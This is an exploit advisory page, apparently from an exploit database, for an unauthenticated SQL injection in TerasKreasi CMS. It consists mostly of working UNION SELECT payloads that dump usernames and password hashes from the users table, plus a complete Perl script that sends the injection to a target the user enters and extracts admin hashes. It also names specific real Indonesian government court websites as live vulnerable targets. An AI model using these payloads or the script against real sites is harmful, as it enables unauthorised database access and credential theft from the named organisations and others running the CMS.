TerasKreasi CMS Remote SQL Injection Exploit Vulnerability

2016.08.30
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

########################### # CahKratif CMS Remote SQL Injection Exploit Vulnerability ########################### ========================================================= [+] Title :- TerasKreasi CMS Remote SQL Injection Exploit Vulnerability [+] Vendor Homepage :- http://teraskreasi.com/ [+] Version :- All Versions [+] Tested on :- Linux - Windows - Mac [+] Category :- webapps [+] Exploit Author :- K33P-S1L3NT [+] Team name :- Ternate Lab Pentesting [+] Official Page :- www.facebook.com/loading.gov/ [+] Available :- sql injection cheat sheet | sql injection Remote Script perl [+] Greedz to :- Indonesian People | Sarang-Paniki | Sarang-Bifi | Kamar-Muka [+] Contact :- aurorakoizora@gmail.com ========================================================= [+] Severity Level :- Medium [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- id, hal-visi-dan-misi-pengadilan-agama-blabla.html (string) [+] Affected Area(s) :- Entire admin, database, Server [+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error [+] SQL vulnerable File :- /home/user/public_html/XXX.php [+] POC :- http://127.0.0.1/hal-visi-dan-misi-pengadilan-agama-blabla' and false UNION SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password),9,10,11,12,13,14,15,16,17,18,19+from+users+--+.html The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction. ################################################################## NOTE!!! [+] Edit the script perl for table vuln on username and password DEMO!!! [+] www.site.com/vuln-bugs' and false UNION SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password),9,10,11,12,13,14,15,16,17,18,19+from+users+--+.html ( edit number column for open table group_concat(username,0x3a,password) ) [ like number 7 or 8 or 9 or 10 or 11 or 12 0r 13 ] [+] www.site.com/vuln-bugs' and false UNION SELECT 1,2,3,4,5,6,7,8,group_concat(username,0x3a,password),10,11,12,13,14,15,16,17,18,19+from+users+--+.html [+] www.site.com/vuln-bugs' and false UNION SELECT 1,2,3,4,5,6,7,8,9,like number,11,12,13,14,15,16,17,18,19+from+users+--+.html ################################################################### Remote Exploit Perl script --------------------------- #!/usr/bin/perl -w ######################################## #[~] Author : K33P-S1L3NT #[!] Exploit Name: Ternate Exploit ######################################## print "\n\n"; print "############################################## # [~] Author : K33P-S1L3NT # # [!] Exploit Name: Ternate Exploit # # [+] Publish : www.facebook.com/loading.gov # ############################################## \n\n"; print "+-+ Remote SQL Injection Exploit +-+ \n\n"; use LWP::UserAgent; print " Target site:[http://wwww.site.com/path/]: "; chomp(my $target=<STDIN>); $Ternate="group_concat(username,0x3a,password)"; $Labs="users"; $Pentesting="'+and+false"; $Exploit="+UNION+SELECT+"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target . "/hal-visi-misi-pengadilan-agama-morotai".$Pentesting."+".$Exploit."1,2,3,4,5,6,7,".$Ternate.",9,10,11,12,13,14,15,16,17,18,19+from+".$Labs."+--+.html"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){ print "\n[+] Admin Account : $1\n\n"; print "# Exploit Done #\n\n"; } else {print "\n[-] NOT FOUND."; } ---------------------------------------------------------------------------------------------------- NOTE SCRIPT!! [+] Edit the script => $host = $target . "/hal-visi-misi-pengadilan-agama-blabla" or $host = $target . "/blabla-bugs-vuln" LIVE!!! http://pa-morotai.go.id/ => http://i.imgur.com/2fqM3WR.png http://pa-ternate.go.id/ => http://i.imgur.com/EmklNdn.png http://pn-tobelo.go.id/ => http://i.imgur.com/2GnnxJ5.png ################################### # # # Discovered Analyze by : Ternate-Labs Pentesting # # # ###################################

References:

https://www.facebook.com/loading.gov


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top